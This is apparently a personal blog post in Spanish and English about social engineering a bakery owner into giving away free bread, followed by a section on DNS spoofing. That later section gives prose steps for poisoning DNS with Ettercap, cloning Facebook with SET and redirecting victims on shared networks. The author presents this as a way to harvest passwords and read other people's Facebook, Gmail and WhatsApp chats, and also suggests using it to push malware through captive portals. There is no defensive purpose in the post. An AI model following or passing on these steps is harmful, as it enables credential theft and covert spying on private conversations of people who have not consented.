- Yo creo que unas 10. obviamente las pagaría y en caso que ustedes me lo pidan puedo pagar un costo mayor. Obviamente le preveo que si ustedes fuesen los elegidos, haríamos un pedido de al menos unas 10, 000 unidades. 
- Excelente, mire, me gusta su idea, déjeme le pasó al área de finanzas para poder llegar a un acuerdo

Well, this is first part… I accorded with the bakery 10 special breads for $4, 000 MX (around $200 dlls) which so expensive, but the person told me that the high price was because… actually I don’t know, but.. hum.. well… see the next part.

- Hola, vengo a recoger un pedido de 10 panes que encargue
- Buenos días Judas, soy Elena, la cheff y dueña  del restaurante, me comentaron acerca de su proyecto de llevar nuestro pan a Mexicali
- Si
- Tienes un ligero acento muy cantadito, pero en el fondo suenas normal
- Si, yo soy chilango; pero bueno, me asocie con unos amigos en esta locura y bueno... la verdad es que yo no voy más allá de hacer unos huevos revueltos, pero me encargo de las relaciones comerciales
- Ven Judas, siéntate conmigo, los panes los tenemos, pero quiero que pruebes uno recién salido del horno para que veas su sabor y textura; y te invito un café delicioso que nos traen de Chiapas
- Ouuu... hum.. ok

Well I passed 3 hours talking about Mexicali, about food, about hacking (yeap.. I told her I’m a security guy).. and after that I got my 10 breads for free… so, my friend will taste the best breads from Mexico City, prepared specially for her by one of the most recognizzed cheffs in the world. I hope she really likes the breads because was so complicated got them.. but well, I’m an expert social engineer 😉

Ouuu.. well, from the 10 breads, just survived 2.. .for her; coff.. coff..

Yes I know.. this is not a technical post, but a good skills on social engineering some times are most important than the technical skills.

Chan, chan, charraaaa…

The magic of the DNS spoofing

After read the post related to intercept Facebook’s chats, I talked with a friend about other more “interesting” things that you can do with this simple attack.

Some months ago at Mexico were reveled attacks to press supposed by the government, using SMS to infect cellphones.. well, I think a SMS is not necessary, just perform a DNS attack to a captive portal in a Starbucks, a hotel, a company.. and redirect with a simple button the user to the malware…

Doubts?… 🙂

Well… you can also apply a DNS spoofing to *.videosXXXparahackearte.com just to create karma 😛

Reading chats

Well.. sometimes.. it’s needed to know what are writing others about you. Why?.. hum.. well, it’s a good question, and I have a great answer.. ok, no.. but yesterday I needed… so….

The most easy way is performing a DNS poisoning, using Ettercap. Open the the ettercap.dns, and modify the different domains you want to catch using the attack, for example.. facebook.com, *.facebook.com, *.gmail.com, gmail.com, web.whatsapp.com, etc…

So, after that you have two options; sniff the traffic using wireshark.. but you need to know that you will need to attack the SSL certificates in order to read the chats, or… open SET, and select the web vectors, clon the targets and point them to your computer, for example, clone https://www.facebook.com.

Now, using Ettercap select the targets you want to attack, select in the plug-ins “DNS poison”, and start sniffing. When the user requests a website that you included in the .dns file, he/she will be redirected to your computer and pwned!… you can catch the passwords, the chats, the requests, and it will be “transparent” because actually the DNS is answering with your IP to the victim.

Don’t judge me…